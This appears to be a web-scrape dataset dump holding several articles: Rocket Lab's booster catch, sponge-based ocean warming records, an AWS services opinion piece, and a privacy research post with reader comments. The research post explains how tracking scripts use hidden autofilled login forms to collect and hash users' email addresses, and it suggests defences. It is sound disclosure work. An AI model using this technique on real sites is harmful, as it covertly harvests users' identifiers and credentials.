id
int64 3
41.8M
| url
stringlengths 1
1.84k
| title
stringlengths 1
9.99k
⌀ | author
stringlengths 1
10k
⌀ | markdown
stringlengths 1
4.36M
⌀ | downloaded
bool 2
classes | meta_extracted
bool 2
classes | parsed
bool 2
classes | description
stringlengths 1
10k
⌀ | filedate
stringclasses 2
values | date
stringlengths 9
19
⌀ | image
stringlengths 1
10k
⌀ | pagetype
stringclasses 365
values | hostname
stringlengths 4
84
⌀ | sitename
stringlengths 1
1.6k
⌀ | tags
stringclasses 0
values | categories
stringclasses 0
values |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
31,260,155 |
https://www.bbc.co.uk/news/science-environment-61307512
|
Rocket Lab: Helicopter catches returning booster over the Pacific
|
Jonathan Amos
|
# Rocket Lab: Helicopter catches returning booster over the Pacific
- Published
**The US-New Zealand Rocket Lab company has taken a big step forward in its quest to re-use its launch vehicles by catching one as it fell back to Earth.**
A helicopter grabbed the booster in mid-air as it parachuted back towards the Pacific Ocean after a mission to orbit 34 satellites.
The pilots weren't entirely happy with how the rocket stage felt slung beneath them and released it for a splashdown.
Nonetheless, company boss Peter Beck lauded his team's efforts.
"Bringing a rocket back from space and catching it with a helicopter is something of a supersonic ballet," the CEO said.
"A tremendous number of factors have to align and many systems have to work together flawlessly, so I am incredibly proud of the stellar efforts of our recovery team and all of our engineers who made this mission and our first catch a success."
Allow Twitter content?
This article contains content provided by Twitter. We ask for your permission before anything is loaded, as they may be using cookies and other technologies. You may want to read Twitter’s cookie policy, external and privacy policy, external before accepting. To view this content choose **‘accept and continue’**.
Mr Beck said the hard parts of rocket recovery had now been proven and he looked forward to his staff perfecting their mid-air technique.
The entrepreneur later published a picture of the rocket stage after it had been picked up by a ship. It was intact and appeared to have coped extremely well with the heat that would have been generated on the descent through the atmosphere.
Today, only one company routinely recovers orbital rocket boosters and reflies them. That's California's SpaceX firm, which propulsively lands its stages back near the launch pad or on a barge out at sea.
Re-using flight-proven boosters should reduce the cost of rocket missions, provided maintenance can be kept to a minimum. SpaceX says very little refurbishment work is required between flights of its Falcon vehicles.
Rocket Lab, external will have to demonstrate similar gains to make the practice worthwhile.
Allow Twitter content?
This article contains content provided by Twitter. We ask for your permission before anything is loaded, as they may be using cookies and other technologies. You may want to read Twitter’s cookie policy, external and privacy policy, external before accepting. To view this content choose **‘accept and continue’**.
Rocket Lab launches its two-stage Electron vehicles from New Zealand's Mahia Peninsula.
The first stage does the initial work of getting a mission off Earth, and once its propellants are expended falls back towards the planet.
The second, or upper, stage, completes the task of placing the satellite passengers in orbit with the help of a small kick-stage called Curie. Both the second stage and this Curie kick-stage eventually fall back into the atmosphere and burn up.
The first stage is given thermal protection as it plunges to Earth at speeds of almost 8,300km/h (5,150mph). Drag will take out much of this energy, before parachutes reduce the velocity to a mere 10m/s (22mph) to allow a Sikorsky S-92 to move in for capture.
Ordinarily, the helicopter would transfer the captured stage to land, but in this instance the pilots thought the load characteristics of the stage were sufficiently different to test flights that safety demanded they offload the booster to let it go into the water.
"I would say 99% of everything we needed to achieve today, we achieved; the 1% was the pilots didn't like the feel of it. So they jettisoned (the stage)," Mr Beck told reporters.
"And really, that kind of accounts for the amount of work we've got to do as well. Ninety-nine percent of the work is done, we'll figure out why the pilots didn't like it and go fix that."
Tuesday's mission, dubbed "There And Back Again", left the ground at 10:49 NZST (22:49 GMT, Monday).
Its primary objective was to take a diverse group of 35 spacecraft to orbit, more than 500km (310 miles) above the Earth. These payloads included four mini-satellites for Scottish manufacturer Alba Orbital, and three for E-Space, a new company started by serial space entrepreneur Greg Wyler.
Mr Wyler is well known in the space business and has been described as the "godfather of mega-constellations", the giant telecommunications networks now being developed by the likes of SpaceX, OneWeb and Amazon.
Mr Wyler founded OneWeb and before that, O3b, which sought to connect the unconnected (O3b stood for "other three billion", the number of people without an internet connection).
His new venture, E-Space, proposes to loft tens of thousands of satellites. But mindful of the congestion in orbit and the risk of collisions this might cause, the businessman claims his forthcoming constellation would also catch space debris and bring it out of the sky, leading to a net-positive impact on the space environment.
| true | true | true |
The US-New Zealand Rocket Lab firm takes a big step forward in its quest to re-use launch vehicles.
|
2024-10-12 00:00:00
|
2022-05-03 00:00:00
|
article
|
bbc.com
|
BBC News
| null | null |
|
4,914,955 |
http://codinginmysleep.com/trend-micro-misses-point-on-bitcoin-mining-malware/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
39,275,272 |
https://eos.org/articles/oceans-may-have-already-seen-1-7c-of-warming
|
Oceans May Have Already Seen 1.7°C of Warming - Eos
|
Kimberly M S Cartier
|
Sponges from the Caribbean retain a record of ocean temperatures stretching back hundreds of years. These newly revealed paleoclimate records suggest that sea surface temperatures (SSTs) began rising in response to industrial era fossil fuel burning around 1860.
That’s 80 years earlier than SST measurements became common and predates the global warming start date used by the Intergovernmental Panel on Climate Change (IPCC). On the basis of these new sponge records, scientists think that temperatures are currently 1.7°C warmer than preindustrial levels.
The study’s researchers argue that the world has already surpassed the goal of the 2015 Paris Agreement to limit atmospheric warming to less than 1.5°C above preindustrial temperatures and that we could reach 2°C of warming before 2030.
“We’re further advanced in the global warming scenario, and the amount of time we have to take action to prevent it is seriously diminished,” said Malcolm McCulloch, a marine and coral geochemist at the University of Western Australia in Crawley and lead author on the new study. “We’ve got to start doing serious mitigation and serious reductions in emissions.”
These results were published in *Nature Climate Change*.
**Old Sponges Fill Gaps**
The sclerosponges studied (*Ceratoporella nicholsoni*) are a group of long-lived sponges that live exclusively in the Caribbean at depths with little variation in light or temperature. Like tree rings, a sponge’s skeleton retains a record of its environmental conditions throughout its lifetime.
“These sponges are extremely slow growing,” explained Amos Winter, a study coauthor and paleoceanographer at Indiana State University in Terre Haute. “A 10-centimeter sponge, which isn’t very large, can go back 400 years.”
That longevity is key to the new study’s analysis of modern-day global warming.
The IPCC compares modern temperatures with the average temperature between 1850 and 1900 to define today’s warming relative to a preindustrial world.
However, “it’s well recognized that human emissions began increasing significantly in the 1750s,” said Duo Chan, a climate scientist at the University of Southampton in the United Kingdom who was not involved with the new study.
Ship-based measurements of SST go back only to around 1850. The records contain many inconsistencies and remain sparse until the mid-1900s, when modern instrumentation took over. Even then, there are notable data gaps during such events as World War II. Paleoclimate proxies such as those stored in sclerosponges can extend the record of SSTs back to truly preindustrial times and help fill gaps in shipboard measurements.
“The IPCC’s adoption of a later preindustrial reference period was a compromise, largely due to the lack of sufficient instrumental data for quantifying global temperatures before the 1850s,” Chan said.
These sclerosponge records can unravel the history of past sea surface temperatures, said Kaustubh Thirumalai, a paleoceanographer at the University of Arizona in Tucson who was not involved with this study. (Thirumalai is a science advisor for *Eos*.)
**An 80-Year Head Start**
With the help of local divers, the researchers collected six sclerosponges from 2007 to 2012 near Puerto Rico and St. Croix in the U.S. Virgin Islands. They used uranium-thorium radioisotope dating to construct a growth timeline for each sponge that goes back about 300 years.
Within each 2-year growth interval, they measured the ratio of strontium to calcium. Calcifying coral skeletons preferentially take in calcium over strontium as temperatures increase, so the ratio is a proxy for seawater temperature. They calibrated their sclerosponge temperature timeline against recent (1964–2012) instrumental measurements.
*Ceratoporella nicholsoni* may be endemic to the Caribbean, but they can be used to understand globally averaged trends.
Scientists have found that temperature trends in Caribbean waters closely follow global mean SST trends. Sclerosponges live at depths within the ocean mixed layer, where temperatures are mostly the same from the surface to about 100 meters down. So the ambient seawater temperatures recorded by sclerosponges can be used to understand sea surface temperatures too.
The sclerosponges recorded some well-known global temperature anomalies, such as the cooling period after the Tambora eruption in 1815. Ocean temperatures were relatively steady from 1700 to 1790, followed by an era of volcanic cooling from 1790 to 1840 and then another steady but slightly warmer period from 1840 to the early 1860s. Researchers trace anthropogenic climate change to that period—about 80 years earlier than instrumental SST records show.
The sponges’ industrial starting line of early-1860s implies that Earth warmed by 1.7°C between then and about 2020, assuming that the land and ocean have warmed by the same amount. That’s about 0.5°C higher than IPCC estimates and suggests that the planet is on track to surpass 2°C of warming before 2030.
Thirumalai found the research to be “innovative and clever,” although he said the sclerosponge records might have too much uncertainty to sufficiently pinpoint events such as the 19th century volcanic cooling. Too, he wanted the researchers to have shown in more detail how temperature trends in the Caribbean were representative of global SST anomalies.
Nevertheless, he said, “it is always useful to generate new and independent paleotemperature records to help minimize uncertainties in our understanding of anthropogenic warming and the baseline of preindustrial conditions.”
**Untangling the Cause of Warming**
“Integrating these sclerosponge findings with corrected instrumental data could offer a more comprehensive view of historical SST evolution,” Chan said. However, he cautioned against immediately adopting the updated warming values.
The sclerosponge warming rates almost mirror modern instrumental records in a broad sense, but there are some differences, even when accounting for different starting lines, Chan said. Research is ongoing to correct some biases and errors in historic instrumental records, which might reconcile some of these differences.
Too, when looking as far back as 1700, Earth’s climate might still have been rebounding from the Little Ice Age (roughly 1300–1850). That might account for some of the warming during the early 19th century, Chan said, but definitely not all.
“It is essential to more accurately distinguish the anthropogenic component from other factors, particularly during the early industrial period,” Chan said. “This distinction not only enhances our understanding of climate change but also has significant political implications, informing policy and target setting in the context of global warming.”
McCulloch, Winter, and their colleagues urged IPCC scientists and climate modelers to consider this new preindustrial starting line. Whether it will be adopted is uncertain, but if the world has already surpassed 1.5°C of warming, the researchers argue that continued climate action is more important than ever.
—Kimberly M. S. Cartier (@AstroKimCartier), Staff Writer
*Correction 12 February 2024: The date of the sclerosponges’ industrial starting line has been updated.*
| true | true | true |
The global warming clock started ticking decades earlier than current estimates assume, according to Caribbean sponges.
|
2024-10-12 00:00:00
|
2024-02-05 00:00:00
|
article
|
eos.org
|
Eos
| null | null |
|
36,579,995 |
https://www.youtube.com/watch?v=KDRnEm-B3AI
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
41,163,398 |
https://justingarrison.com/blog/2024-08-05-more-aws-services-they-should-cancel/
|
21 More AWS Services They Should Cancel
| null |
# 21 More AWS Services They Should Cancel
##### Posted on August 5, 2024 • 7 minutes • 1416 words
AWS has recently been silently removing services for new users. They claim existing customers will not be affected for many of the services, but it is clear that the company is trying to reduce their overhead and trim some fat.
Since December 2023 they have deprecated 14 services, features, or versions of services. Of course Amazon doesn’t keep track of these changes and until someone makes a killedbygoogle for AWS we’ll have to hear about it from other customers . Services include Honeycode, Cloud9, CodeCommit, and a bunch of others you’ve never heard of.
So here’s services I think AWS should cancel. I’ll start with the obvious ones and get more bold down the list. More cuts are coming. Be prepared for how you’ll migrate.
What would you kill? Let me know on bluesky . Services crossed out on this list were announced deprecated after writing this post.
- Amazon Managed Blockchain
- Amazon Workmail
~~AWS App Mesh~~- AWS Proton
- AWS Elastic Beanstalk
- Amazon Lightsail
- Amazon GameLift
- Amazon Bracket
- Amazon CodeGuru
~~AWS Deep Racer~~- Amazon Personalize
- Amazon Kendra
- AWS App2Container
- Amazon TimeStream
~~Amazon RDS on VMware~~- Bottlerocket
- AWS Cloud Control API
- NAT Gateway
- Amazon ACK
- AWS CloudFormation
- AWS CDK
## Blockchain
I have no idea how this 6 pager was created and passed through the rigorous OP1 process. Some PM pulled together a bunch of data and lied about it to leadership and they fell for it.
This is the exact thing I was referring to when I wrote about How to Lie with Data . It’s a problem at any “data driven company” and when one group of people have all the power it’ll happen.
## WorkMail
Even Amazon doesn’t use WorkMail. Why is this being inflicted on customers?
## AppMesh
This is an obvious service that got very little adoption and is already being replaced with VPC Lattice. It’s no surprise that App Mesh should be retired and probably should have been a long time ago.
## Proton
I worked at Amazon when Proton was being developed and all of the OP1 docs and 6 pagers didn’t make sense to me. There was a lot of data arguing for a platform engineering type team that would use it to build abstractions for the rest of the company.
The workflows and use cases were completely contrived and it was a new interface for CloudFormation. Can we please stop pretending a new interface on top of a terrible service is going to work?
## Beanstalk
Beanstalk was great when it was created and people didn’t know how to create CI/CD and there wasn’t a proliferation of automated build tools. In 2024 it’s not kept up with best practices and people looking for something simple and automatic should look elsewhere.
It was partially replaced with App Runner and if Beanstalk wasn’t so successful, and App Runner so unsuccessful, I’m assuming they would have already killed it.
## Lightsail
I actually really like Lightsail. It’s the simplified version of AWS with simpler pricing and keeps people using fundamentals. But it’ll never succeed at AWS. There’s not enough money or investment in it and it should be retired so someone else can build something better. This is the only service I want AWS to cancel so it can get better.
## GameLift
The gaming industry has been reducing costs in many different ways and investing in a proprietary game server services is not what they’re going to use going forward. There are much better open source options and no one should tie their game success to something tied to a single vendor.
## Bracket
QLDB is shut down and Bracket isn’t helping anyone learn quantum computing. This is an obvious service to cut for something no one is asking for.
## CodeGuru
I thought this was already being retired. Why is this still around? This is obviously going to be replaced with Amazon Q and the longer they keep CodeGuru around the more trust they lose with customers.
## DeepRacer
This was a cool tech demo. Not a product.
In the beginning this was a halo product , like lambda, but now it’s kinda embarrassing how little the tools have improved.
## Personalize
If I buy a toaster Amazon’s recommendation engine will recommend more toasters.
Anyone that would use a personalization service based on Amazon’s recommendation engine hasn’t looked at any other options.
It’s only a matter of time until this is rebranded under the Q umbrella (`sed 's/ML/AI/g'`
) or shut down.
## Kendra
Kendra is already jumping on the LLM train and I know how painful “Enterprise search” can be. But all of the examples I’ve seen look like they could use any number of other services or tools.
## App2Container
You created an app and want to run it in containers, but you refuse to learn how to package it. This isn’t going to work out well for you.
I understand enterprise applications are extremely complex, and I also think if you’re not going to take the time to understand the platform where it runs you shouldn’t be automating the migration. This is another neat tech demo that somehow wrote enough documents to turn into a product and it should go away.
## Timestream
Timestream was announced and 2 years later came out. It’s a hosted version of InfluxDB.
I don’t know if the delay was legal issues or lack of HA options for Influx, but anyone that waited around to realize it’s just InfluxDB under the hood–which I think is a good time series database–must have been disappointed. Influx is one of the easiest databases I’ve ever run and you don’t need to pay Amazon premiums to use it.
## RDS on VMware
Anyone using VMmare an AWS deserves to pay out the nose for licensing. The same goes for using AWS on VMware.
I have no idea how widely this service is adopted, but I have a feeling more than one DBA team was let go so companies could afford it.
## Bottlerocket
Amazon isn’t good at Linux Distros. If Amazon Linux wasn’t the default supported option I doubt it would have ever been used. A Linux distro that can only be used in one environment, AWS, with less frequent updates and more convoluted packaging options is a bad technology choice.
Bottlerocket takes it one step further by limiting where you can use the OS in AWS. I am all for API driven Linux–I work at Sidero Labs after all–but this is poorly designed and not well maintained. It’ll also probably get huge adoption once it becomes the default for EKS and Karpenter.
It should be shut down before it causes a lot of pain for customers, or it should be completely re-written to follow an open API spec.
## Cloud Control API
A single, consistent API for all of AWS sounds like a good thing. Until you realize that API is just a different interface for CloudFormation and is stateful.
I know some tools started adopting this API, but I have no idea where their migration stands and how it’s working out for them.
## Nat Gateway
This is possibly the most customer hostile service AWS runs. It’s required for basic functionality and has predatory pricing. Please, please, please get rid of this service and make it a built in VPC option without the price gauging.
## ACK
Everything should be a Kubernetes CRD has been an idea floating around for a while. ACK was an attempt to autogenerate Kubernetes controllers from the service SDK’s and make the service teams own it. They didn’t want to own it and the API descrepencies between services made a lot of edge cases in the generated code and hard to onboard new services.
If you want this, use Crossplane instead. It has broader support for infrastructure providers (not just AWS) and has a more flexible way to build “packages” to group infrastructure resources together. At least CDK doesn’t use CloudFormation.
## CloudFormation
There are very few people and companies that I know like CloudFormation. None more than Amazon.
I think an infrastructure as code service is a good idea, but I think CloudFormation is a terrible interface and should be completely replaced.
## CDK
I know there are some very passionate CDK users, but it’s yet another wrapper on top of CloudFormation and if CloudFormation needs to be deprecated then CDK needs to too. There are plenty of other people who are getting disenchanted with it and I think there are other better options that exist. Maybe the CDK can stay in some form on top of whatever replaces CloudFormation.
| true | true | true |
Please Amazon 🙏 kill these services too.
|
2024-10-12 00:00:00
|
2024-08-05 00:00:00
|
article
|
justingarrison.com
|
Justin Garrison
| null | null |
|
4,351,167 |
http://www.raywenderlich.com/19781/electronics-for-iphone-developers-tutorial-create-an-arduino-traffic-light
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
130,608 |
http://hcsoftware.sourceforge.net/gravitation/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
3,088,342 |
http://www.bgr.com/2011/10/08/pre-sales-of-disappointing-iphone-4s-fail-to-disappoint/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
16,021,852 |
https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/
|
No boundaries for user identities: Web trackers exploit browser login managers
|
Gunes Acar
|
*In this second installment of the **“No Boundaries” series**, we show how a long-known vulnerability in browsers’ built-in password managers is abused by third-party scripts for tracking on more than a thousand sites.*
by Gunes Acar, Steven Englehardt, and Arvind Narayanan
We show how third-party scripts exploit browsers’ built-in login managers (also called password managers) to retrieve and exfiltrate user identifiers without user awareness. To the best of our knowledge, our research is the first to show that login managers are being abused by third-party scripts for the purposes of web tracking.
The underlying vulnerability of login managers to credential theft has been known for years. Much of the past discussion has focused on password exfiltration by malicious scripts through cross-site scripting (XSS) attacks. Fortunately, we haven’t found password theft on the 50,000 sites that we analyzed. Instead, we found tracking scripts embedded by the first party abusing the same technique to extract emails addresses for building tracking identifiers.
The image above shows the process. First, a user fills out a login form on the page and asks the browser to save the login. The tracking script is not present on the login page [1]. Then, the user visits another page on the same website which includes the third-party tracking script. The tracking script inserts an invisible login form, which is automatically filled in by the browser’s login manager. The third-party script retrieves the user’s email address by reading the populated form and sends the email hashes to third-party servers.
You can test the attack yourself on our live **demo page**.
We found two scripts using this technique to extract email addresses from login managers on the websites which embed them. These addresses are then hashed and sent to one or more third-party servers. These scripts were present on 1110 of the Alexa top 1 million sites. The process of detecting these scripts is described in our measurement methodology in the Appendix 1. We provide a brief analysis of each script in the sections below.
**Why does the attack work?** All major browsers have built-in login managers that save and automatically fill in username and password data to make the login experience more seamless. The set of heuristics used to determine which login forms will be autofilled varies by browser, but the basic requirement is that a username and password field be available.
Login form autofilling in general doesn’t require user interaction; all of the major browsers will autofill the username (often an email address) immediately, regardless of the visibility of the form. Chrome doesn’t autofill the password field until the user clicks or touches anywhere on the page. Other browsers we tested [2] don’t require user interaction to autofill password fields.
Thus, third-party javascript can retrieve the saved credentials by creating a form with the username and password fields, which will then be autofilled by the login manager.
**Why collect hashes of email addresses?** Email addresses are unique and persistent, and thus the hash of an email address is an excellent tracking identifier. A user’s email address will almost never change — clearing cookies, using private browsing mode, or switching devices won’t prevent tracking. The hash of an email address can be used to connect the pieces of an online profile scattered across different browsers, devices, and mobile apps. It can also serve as a link between browsing history profiles before and after cookie clears. In a previous blog post on email tracking, we described in detail why a hashed email address is not an anonymous identifier.
**Scripts exploiting browser login managers
**
*List of sites embedding scripts that abuse login manager for tracking*
“
*Smart Advertising Performance*” and “
*Big Data Marketing*” are the taglines used by the two companies who own the scripts that abuse login managers to extract email addresses. We have manually analyzed the scripts that contained the attack code and verified the attack steps described above. The snippets from the two scripts are given in Appendix 2.
**Adthink (audienceinsights.net): **After injecting an invisible form and reading the email address, Adthink script sends MD5, SHA1 and SHA256 hashes of the email address to its server (secure.audienceinsights.net). Adthink then triggers another request containing the MD5 hash of the email to data broker Acxiom (p-eu.acxiom-online.com).
The Adthink script contains very detailed categories for personal, financial, physical traits, as well as intents, interests and demographics. It is hard to comment on the exact use of these categories but it gives a glimpse of what our online profiles are made up of:
|
**OnAudience (behavioralengine.com): **The OnAudience script is most commonly present on Polish websites, including newspapers, ISPs and online retailers. 45 of the 63 sites that contain OnAudience script have “.pl” country code top-level domain.
The script sends the MD5 hash of the email back to its server after reading it through the login manager. OnAudience script also collects browser features including plugins, MIME types, screen dimensions, language, timezone information, user agent string, OS and CPU information. The script then generates a hash based on this browser fingerprint. OnAudience claims to use anonymous data only, but hashed email addresses are not anonymous. If an attacker wants to determine whether a user is in the dataset, they can simply hash the user’s email address and search for records associated with that hash. For a more detailed discussion, see our previous blog post.
**Is this attack new?** This and similar attacks have been discussed in a number of browser bug reports and academic papers for at least 11 years. Much of the previous discussion focuses on the security implications of the current functionality, and on the security-usability tradeoff of the autofill functionality.
Several researchers showed that it is possible to steal passwords from login managers through cross-site scripting (XSS) attacks [3,4,5,6,7]. Login managers and XSS is a dangerous mixture for two reasons: 1) passwords retrieved by XSS can have more devastating effects compared to cookie theft, as users commonly reuse passwords across different sites; 2) login managers extend the attack surface for the password theft, as an XSS attack can steal passwords on any page within a site, even those which don’t contain a login form.
**How did we get here?** You may wonder how a security vulnerability persisted for 11 years. That’s because from a narrow browser security perspective, there is no vulnerability, and everything is working as intended. Let us explain.
The web’s security rests on the Same Origin Policy. In this model, scripts and content from different origins (roughly, domains or websites) are treated as mutually untrusting, and the browser protects them from interfering with each other. However, if a publisher directly embeds a third-party script, rather than isolating it in an iframe, the script is treated as coming from the publisher’s origin. Thus, the publisher (and its users) entirely lose the protections of the same origin policy, and there is nothing preventing the script from exfiltrating sensitive information. Sadly, direct embedding is common — and, in fact, the default — which also explains why the vulnerabilities we exposed in our previous post were possible.
This model is a poor fit for reality. Publishers neither completely trust nor completely mistrust third parties, and thus neither of the two options (iframe sandboxing and direct embedding) is a good fit: one limits functionality and the other is a privacy nightmare. We’ve found repeatedly through our research that third parties are quite opaque about the behavior of their scripts, and at any rate, most publishers don’t have the time or technical knowhow to evaluate them. Thus, we’re stuck with this uneasy relationship between publishers and third parties for the foreseeable future.
**The browser vendor’s dilemma.** It is clear that the Same-Origin Policy is a poor fit for trust relationships on the web today, and that other security defenses would help. But there is another dilemma for browser vendors: should they defend against this and other similar vulnerabilities, or view it as the publisher’s fault for embedding the third party at all?
There are good arguments for both views. Currently browser vendors seem to adopt the latter for the login manager issue, viewing it as the publisher’s burden. In general, there is no principled way to defend against third parties that are present on some pages on a site from accessing sensitive data on other pages of the same site. For example, if a user simultaneously has two tabs from the same site open — one containing a login form but no third party, and vice versa — then the third-party script can “reach across” browser tabs and exfiltrate the login information under certain circumstances. By embedding a third party *anywhere* on its site, the publisher signals that it completely trusts the third party.
Yet, in other cases, browser vendors have chosen to adopt defenses even if necessarily imperfect. For example, the HTTPOnly cookie attribute was introduced to limit the impact of XSS attacks by blocking the script access to security critical cookies.
There is another relevant factor: our discovery means that autofill is not just a security vulnerability but also a privacy threat. While the security community strongly prefers principled solutions whenever possible, when it comes to web tracking, we have generally been willing to embrace more heuristic defenses such as blocklists.
**Countermeasures.** Publishers, users, and browser vendors can all take steps to prevent autofill data exfiltration. We discuss each in turn.
Publishers can isolate login forms by putting them on a separate subdomain, which prevents autofill from working on non-login pages. This does have drawbacks including an increase in engineering complexity. Alternately they could isolate third parties using frameworks like Safeframe. Safeframe makes it easier for the publisher scripts and iframed scripts to communicate, thus blunting the effect of sandboxing. Any such technique requires additional engineering by the publisher compared to simply dropping a third-party script into the web page.
Users can install ad blockers or tracking protection extensions to prevent tracking by invasive third-party scripts. The domains used to serve the two scripts (behavioralengine.com and audienceinsights.net) are blocked by the EasyPrivacy blocklist.
Now we turn to browsers. The simplest defense is to allow users to disable login autofill. For instance, the Firefox preference `signon.autofillForms`
can be set to false to disable autofilling of credentials.
A less crude defense is to require user interaction before autofilling login forms. Browser vendors have been reluctant to do this because of the usability overhead, but given the evidence of autofill abuse in the wild, this overhead might be justifiable.
The upcoming W3C Credential Management API requires browsers to display a notification when user credentials are provided to a page [8]. Browsers may display the same notification when login information is autofilled by the built-in login managers. Displays of this type won’t directly prevent abuse, but they make attacks more visible to publishers and privacy-conscious users.
Finally, the “writeonly form fields” idea can be a promising direction to secure login forms in general. The briefly discussed proposal defines ways to deny read access to form elements and suggests the use of placeholder nonces to protect autofilled credentials [9].
**Conclusion**
Built-in login managers have a positive effect on web security: they curtail password reuse by making it easy to use complex passwords, and they make phishing attacks are harder to mount. Yet, browser vendors should reconsider allowing stealthy access to autofilled login forms in the light of our findings. More generally, for every browser feature, browser developers and standard bodies should consider how it might be abused by untrustworthy third-party scripts.
**End notes:**
[1] We found that login pages contain 25% fewer third-parties compared to pages without login forms. The analysis was based on our crawl of 300,000 pages from 50,000 sites.
[2] We tested the following browsers: Firefox, Chrome, Internet Explorer, Edge, Safari.
[3] https://labs.neohapsis.com/2012/04/25/abusing-password-managers-with-xss/
[4] https://www.honoki.net/2014/05/grab-password-with-xss/
[5] https://web.archive.org/web/20150131032001/http://ha.ckers.org:80/blog/20060821/stealing-user-information-via-automatic-form-filling/
[6] http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html
[7] https://ancat.github.io/xss/2017/01/08/stealing-plaintext-passwords.html
[8] “User agents MUST notify users when credentials are provided to an origin. This could take the form of an icon in the address bar, or some similar location.” https://w3c.github.io/webappsec-credential-management/#user-mediation-requirement
[9] Originally proposed in https://www.ben-stock.de/wp-content/uploads/asiacss2014.pdf
[10] https://jacob.hoffman-andrews.com/README/2017/01/15/how-not-to-get-phished.html
**APPENDICES**
**Appendix 1 – Methodology**
To study password manager abuse, we extended OpenWPM to simulate a user with saved login credentials and added instrumentation to monitor form access. We used Firefox’s nsILoginManager interface to add login credentials as if they were previously stored by the user. We did not otherwise alter the functionality of the password manager or attempt to manually fill login forms. This allowed us to capture actual abuses of the browser login manager, as any exfiltrated data must have originated from the login manager.
We crawled 50,000 sites from the Alexa top 1 million. We used the following sampling strategy: visit all of the top 15,000 sites, randomly sample 15,000 sites from the Alexa rank range [15,000 100,000), and randomly sample 20,000 sites from the range [100,000, 1,000,000). This combination allowed us to observe the attacks on both high and low traffic sites. On each of these 50,000 sites we visited 6 pages: the front page and a set of 5 other pages randomly sampled from the internal links on the front page.
The fake login credentials acted as bait, allowing us to introduce an email and password to the page that could be collected by third parties without any additional interaction. Detection of email address collection was done by inspecting JavaScript calls related to form creation and access, and by the analysis of the HTTP traffic. Specifically, we used the following instrumentation:
- Mutation events to monitor elements inserted to the page DOM. This allowed us to detect the injection of fake login forms. When a mutation event fires, we record the current call stack and serialize the inserted HTML elements.
- Instrument HTMLInputElement to intercept access to form input fields. We log the input field value that is being read to detect when the bait email (autofilled by the built-in password manager) was sniffed.
- Store HTTP request and response data, including POST payloads to detect the exfiltration of the email address or password.
For both JavaScript (1, 2) and HTTP instrumentation (3) we store JavaScript stack traces at the time of the function call or the HTTP request. We then parse the stack trace to pin down the initiators of an HTTP request or the parties responsible for inserting or accessing a form.
We then combine the instrumentation data to select scripts that:
- inject an HTML element containing a password field (recall that the password field is necessary for the built-in password manager to kick in)
- read the email address from the input field automatically filled by the browser’s login manager
- send the email address, or a hash of it, over HTTP
To verify the findings of the automated experiments we manually analyzed sites that embed the two scripts that match these conditions. We have verified that the forms that the scripts inserted were not visible. We then opened accounts on the sites that allow registration and let the browser store the login information (by clicking yes to the dialog in Figure 1). We then visited another page on the site and verified that browser password manager filled the invisible form injected by the scripts.
**Appendix 2 – Code Snippets**
Has this autofill vulnerability been addressed by the browser manufacturers yet? Anyone know?
Safari “[d]isabled Automatic AutoFill of user names and passwords at page load to prevent sharing information without user consent” in Technology Preview 48, released just two days ago:
https://webkit.org/blog/8084/release-notes-for-safari-technology-preview-48/
(We have not had a chance to test this release yet)
Chrome and Firefox are also considering deploying a fix:
https://bugs.chromium.org/p/chromium/issues/detail?id=798492
https://bugzilla.mozilla.org/show_bug.cgi?id=1427543
I’m not a web-site developer so excuse a my web-dev ignorance, but this scenario stuck me as a potential for exploitation.
If, through this exploit method described, would it be possible for a site who has embedded (say) Paypal onto their web-page (via a hidden iFrame or a window.open method where the source of the child window is manipulated somehow) to then be able to grab your paypal login credentials since the parent window is able to read (and modify ??) elements of the child iFrame or child window?
I understand the PayPal detects that it is running in an iFrame, and blocks rendering of any content. But does the same hold for a Child Window and other services
See http://www.dyn-web.com/tutorials/iframes/refs/iframe.php which demonstrates controlling an iFrame from a parent window.
Hi AConcernedAussie,
That’d be a devastating attack but access to cross-origin frames will be prevented by the same-origin policy.
The post you linked to describes access to frames from the same origin.
Thanks Gunes
My instincts were telling me what you have said, but thought it worth asking 🙂
The link was for my benefit more than anyone elses, when I started looking at the possible broader outcomes
Hi,
My website is listed as a website using audienceinsights js script… but I find no trace of this script in my code source.
So I do not understand how you have found this script on my website and why he is listed in your article…
Could you please contact me and explain?
Maybe there is another js using this script but I am not able to find it.
Thanks for your help
David
Hi David,
Your site embeds media-clic.com, which loads a script from themoneytizer.com, which finally loads audienceinsights.net:
`https://www.excel-downloads.com/`
->
https://pub3.media-clic.com/www/delivery/asyncjs.js
->
https://ads.themoneytizer.com/s/requestform.js?siteId=10013&formatId=1
->
https://static.audienceinsights.net/t.js
Your site (excel-downloads.com) was crawled on 2017-09-13.
Thanks for your fine efforts on this subject.
Are there any legal minds in the group who can explain how this scripting and password capturing is NOT a violation of telecommunications intercept laws? Did we give away those privacy rights in a user agreement somewhere?
https://www.law.cornell.edu/uscode/text/18/2511
KeePass combined with the extension can autofill the password if the autofill is enabled (configurable through the extension).
For Gecko-based browsers, there is signon.autofillForms option in about_config that can prevent the attack.
I am bit Confused here, Is it possible to extract and send all stored credentials within the browser’s password manager OR only the credentials for that particular site(In which the tracking script is not present on the login page) which user has visited can be possible?
Thanks
Ankur
Hi Ankur,
Only the credentials saved for that particular domain can be extracted.
This is just one way you can be tracked online by third-party services. Plugging this “hole” wouldn’t do much to stop the tracking.
The standard way to integrate with a third-party network is for the site owner to place HTML code (either JavaScript or even an IMG tag) that sends the site’s own cookie ID for a user to the third party. The site can via a server-side API call, or via an offline batch process, send all user information associated with that cookie ID to the third party. The third-party code doesn’t need to “scrape” anything for this to work.
Of course, this requires cooperation of the primary website. But any site including tracking code is already working with the tracker.
Fixing this would also protect against malicious scripts that exploit the same vulnerability through XSS attacks or malvertising campaigns. The server-side communication is possible, but costly compared to including one line of JavaScript.
Keeper has written a response to this issue on our blog:
https://blog.keepersecurity.com/2018/01/02/response-princetons-center-information-technology-policy-article/
Per the 1Password comment above, would something like LastPass, with autofill enabled, also be vulnerable? I am guessing it would be.
I’ve tried the demo, but after sending the fake e-mail/password I’ve got an error page (404) only…
At the next try it was working, but the result is two question marks 🙂
